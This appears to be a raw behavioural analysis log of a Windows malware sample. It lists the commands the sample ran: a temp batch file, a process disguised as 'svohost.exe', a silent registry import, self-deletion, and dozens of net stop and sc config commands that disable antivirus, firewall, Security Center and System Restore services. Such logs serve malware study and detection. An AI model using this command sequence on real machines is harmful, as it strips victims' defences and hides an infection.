%systemdrive%\docume~1\testing\locals~1\temp\$$a4.bat
net stop kingsoft antivirus service
net1 stop kingsoft antivirus service
%windir%\system32\dumprep.exe 1164 -dm 7 7 %systemdrive%\docume~1\testing\locals~1\temp\wera75d.dir00\explorer.exe.mdmp 16325836412029352
%windir%\system32\dumprep.exe 1164 -dm 7 7 %systemdrive%\docume~1\testing\locals~1\temp\wera75d.dir00\explorer.exe.hdmp 16325836412029364
%windir%\system32\svohost.exe
%windir%\regedit.exe /s %windir%\system32\noruns.reg
%windir%\system32\cmd.exe /c del %workingdir%\[random name].exe
%windir%\system32\rundll32.exe %windir%\system32\sysdm.cpl,noexecuteprocessexception %windir%\explorer.exe
%windir%\system32\drwtsn32 -p 1628 -e 1408 -g
%windir%\system32\dwwin.exe -x -s 1480
%windir%\system32\net.exe stop srservice
%windir%\system32\sc.exe config srservice start= disabled
%windir%\system32\net.exe stop sharedaccess
%windir%\system32\net.exe stop kvwsc
%windir%\system32\sc.exe config kvwsc start= disabled
%windir%\system32\net.exe stop kvsrvxp
%windir%\system32\sc.exe config kvsrvxp start= disabled
%windir%\system32\net.exe stop kavsvc
%windir%\system32\sc.exe config kavsvc start= disabled
%windir%\system32\net.exe stop wscsvc
%windir%\system32\sc.exe config wscsvc start= disabled
%windir%\system32\net.exe stop sndsrvc
%windir%\system32\sc.exe config sndsrvc start= disabled
%windir%\system32\net.exe stop ccproxy
%windir%\system32\sc.exe config ccproxy start= disabled
%windir%\system32\net.exe stop ccevtmgr
%windir%\system32\sc.exe config ccevtmgr start= disabled
%windir%\system32\net.exe stop ccsetmgr
%windir%\system32\sc.exe config ccsetmgr start= disabled
%windir%\system32\net.exe stop spbbcsvc
%windir%\system32\sc.exe config spbbcsvc start= disabled
%windir%\system32\net.exe stop symantec core lc
%windir%\system32\sc.exe config symantec core lc start= disabled
net1 stop symantec core lc
%windir%\system32\net.exe stop npfmntor
%windir%\system32\sc.exe config npfmntor start= disabled
%windir%\system32\net.exe stop mskservice
%windir%\system32\sc.exe config mskservice start= disabled
%windir%\system32\net.exe stop mctaskmanager
%windir%\system32\sc.exe config mctaskmanager start= disabled
%windir%\system32\net.exe stop mcshield
%windir%\system32\sc.exe config mcshield start= disabled
%windir%\system32\net.exe stop mcafeeframework
%windir%\system32\sc.exe config mcafeeframework start= disabled
net1 stop mcafeeframework
%windir%\system32\sc.exe config rsravmon start= disabled
%windir%\system32\net.exe stop rsccenter
%windir%\system32\sc.exe config rsccenter start= disabled
%windir%\system32\net.exe stop rsravmon